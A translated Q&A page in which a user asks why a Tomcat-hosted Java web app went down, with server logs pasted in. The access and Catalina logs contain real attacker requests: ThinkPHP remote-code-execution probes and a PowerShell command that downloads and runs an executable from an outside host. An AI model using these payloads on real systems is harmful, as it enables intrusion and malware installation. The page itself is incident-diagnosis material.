文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
MCP广场
返回腾讯云官网
社区首页 >问答首页 >托管在tomcat中的Java web应用程序挂了10多分钟,日志中包含了powershell攻击

托管在tomcat中的Java web应用程序挂了10多分钟,日志中包含了powershell攻击
EN

Security用户
提问于 2019-07-17 13:22:02
回答 1查看 255关注 0票数 -1

我们有一个运行在tomcat中的java web应用程序,它托管在AWS中。服务器中使用的操作系统是Centos。今天,它已经超过10分钟无法进入了。当我们进入时,我们检查日志以了解发生了什么。有趣的是,日志包含以下内容

代码语言:javascript
运行
复制
Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.

当我更多地检查时,我发现在下午2:22到2:39之间没有日志,这是服务器无法访问的时间范围。

Application日志:-

代码语言:javascript
运行
复制
2019-07-17 14:20:11.620 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39208, 0) already exists.
2019-07-17 14:20:53.469 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39209, 0) already exists.
2019-07-17 14:21:32.329 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.473 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.987 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39213, 0) already exists.
2019-07-17 14:22:34.338 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39215, 0) already exists.
2019-07-17 14:45:04.900 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39217, 0) already exists.
2019-07-17 14:45:49.877 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39218, 0) already exists.
2019-07-17 14:47:14.155 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39219, 0) already exists.
2019-07-17 14:47:20.484 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39220, 0) already exists.
2019-07-17 14:49:09.092 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39221, 0) already exists.
2019-07-17 14:49:54.520 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39223, 0) already exists.

Access日志:-

代码语言:javascript
运行
复制
[17/Jul/2019:14:22:27 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 200 -
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 166
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 431
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 281
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 1131
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 537
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 3484
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 23255
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3170
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44314
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3512
[17/Jul/2019:14:22:29 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3451
[17/Jul/2019:14:22:30 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 11953
[17/Jul/2019:14:22:31 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 16527
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44218
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 4695
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 3675
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7287
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 8066
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 9802
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 2634
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44122
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 2132
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44028
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 1800
[17/Jul/2019:14:39:38 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 4926
[17/Jul/2019:14:39:38 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:38 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:39 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:39:40 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 13606
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:39:42 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:42 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "POST /tmUnblock.cgi HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 200 1724
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:44 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354390370 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:44 +0530] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/vaadinBootstrap.js?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/themes/abcerp/styles.css?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354393114 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/popupbutton/popupbutton.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354389975 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/themes/valo/shared/img/spinner.gif HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/fi_jasoft_dragdroplayouts/dragdroplayouts.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_timeline/styles.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_calendar/calendar.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/easyuploads.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:47 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/filtertable/filtertable.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:54 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7730
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /?v-1563354393116 HTTP/1.1" 200 4843
[17/Jul/2019:14:39:55 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/abcerp/img/symphony.png HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Light-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Regular-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /APP/global/0/legacy/0/20180410112140264.png HTTP/1.1" 200 12363
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 8023
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=3 HTTP/1.1" 200 237
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=3 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:40:12 +0530] "GET / HTTP/1.1" 200 1706

Catalina日志:-

代码语言:javascript
运行
复制
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server version:        Apache Tomcat/7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server built:          Sep 14 2016 12:12:26 UTC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server number:         7.0.72.0
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Name:               Linux
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Version:            3.10.0-693.21.1.el7.x86_64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Architecture:          amd64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Java Home:             /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.el7_4.x86_64/jre
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Version:           1.7.0_171-mockbuild_2018_02_27_14_27-b00
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Vendor:            Oracle Corporation
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_BASE:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_HOME:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.config.file=/var/abc/ERP/apache-tomcat-7.0.72/conf/logging.properties
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djdk.tls.ephemeralDHKeySize=2048
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dfile.encoding=UTF8
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dlog4j.ignoreTCL=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dserver.name=
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dorg.apache.catalina.loader.WebappClassLoader.ENABLE_CLEAR_REFERENCES=false
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dmail.debug=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Duser.timezone=GMT+5.30
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xms12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xmx12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:MaxPermSize=4096m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSClassUnloadingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSPermGenSweepingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+UseConcMarkSweepGC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:NewRatio=2
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDetails
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDateStamps
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:-HeapDumpOnOutOfMemoryError
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:HeapDumpPath=/var/abc/dump
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.endorsed.dirs=/var/abc/ERP/apache-tomcat-7.0.72/endorsed
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.base=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.home=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.io.tmpdir=/var/abc/ERP/apache-tomcat-7.0.72/temp
Jul 17, 2019 2:00:17 AM org.apache.catalina.core.AprLifecycleListener lifecycleEvent
INFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: /usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:00:18 AM org.apache.catalina.startup.Catalina load
INFO: Initialization processed in 1898 ms
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardService startInternal
INFO: Starting service Catalina
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardEngine startInternal
INFO: Starting Servlet Engine: Apache Tomcat/7.0.72
Jul 17, 2019 2:00:18 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:33 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:33 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:00:53 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deploying web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war
Jul 17, 2019 2:00:53 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:56 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [/abcERP] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:56 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deployment of web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war has finished in 18,798 ms
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager has finished in 78 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples has finished in 388 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs has finished in 36 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager has finished in 29 ms
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.Catalina start
INFO: Server startup in 54377 ms
Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.
Jul 17, 2019 3:33:04 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "tomcat"
Jul 17, 2019 3:33:07 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "manager"
Jul 17, 2019 3:33:10 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "admin"
Jul 17, 2019 3:33:15 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "root"

有人能解释一下发生了什么吗?

malware
centos
powershell
tomcat
web-application
EN

回答 1

Security用户

发布于 2019-07-17 13:34:14

看起来像一些恶意的参与者自动攻击工具试图利用tomcat。不能保证停机时间与此攻击相关联,因为Tomcat实例可能经常收到类似的攻击。我建议看看其他可能导致停工的东西。

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/213620

复制
相关文章

相似问题

领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档